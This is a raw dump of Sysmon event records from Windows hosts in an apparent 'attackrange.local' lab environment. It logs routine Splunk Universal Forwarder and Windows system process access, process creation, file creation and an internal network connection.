08:01:24.360{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809182Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:01:24.360{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809181Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:24.360{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809180Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:01:24.360{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809179Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:24.360{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809178Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:01:24.360{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F6D4-60EB-B279-00000000D001}3064C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809177Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:24.360{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F6D4-60EB-B279-00000000D001}3064C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809176Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:24.345{0C1E0330-F6D4-60EB-B279-00000000D001}3064C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000809175Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:24.344{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F62E156A581412A31A9338067201D4B3,SHA256=B6343DEBAA827C8557F47BB933547E5E4C74460CF619593ACDEB36C64359CD1B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052389Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:24.234{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60C31950F04A7F6AD22FB7A9C1329ADF,SHA256=CE69565CD361CBA76A9381461AA2E2CC834AA9030F12C08491A9F192A66B3215,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809219Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:25.891{0C1E0330-F6D5-60EB-B479-00000000D001}1544644C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000809218Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:25.766{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=417019E185704B06FA3B506DB28AE096,SHA256=469990C37BF13368F00AE1D067CE58FC0DC64A09BD9B084C7041887152771B73,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809217Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:25.735{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F6D5-60EB-B479-00000000D001}1544C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809216Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:01:25.735{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809215Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:25.735{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809214Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:01:25.735{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809213Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:25.735{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809212Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:01:25.735{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809211Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:25.735{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809210Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:01:25.735{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809209Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:25.735{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809208Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:01:25.719{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809207Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:25.719{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F6D5-60EB-B479-00000000D001}1544C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809206Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:25.719{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F6D5-60EB-B479-00000000D001}1544C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809205Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:25.720{0C1E0330-F6D5-60EB-B479-00000000D001}1544C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000809204Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:25.406{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=923CB4F0D667D646BE12285618C91AF0,SHA256=27F06980E23D42620B5C45724E2B5662B2B2C2229C9248C8776D9E07289B9960,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809203Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:25.406{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=405F63C43620F942F889F7068F324FD8,SHA256=D434A0FEC8E1EFDB29A4684FC2987B46C90BE75036D5A1B38EEF15B84402CC1F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052390Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:25.249{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4204339CE5B4912229C07E97391D33C,SHA256=2C759E564BF7F6F934B2568C9EC7B3786B8D6C37814FD5984C2D0B2C19A9CE37,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809202Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:23.367{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57382-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000809201Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:25.047{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F6D5-60EB-B379-00000000D001}736C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809200Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
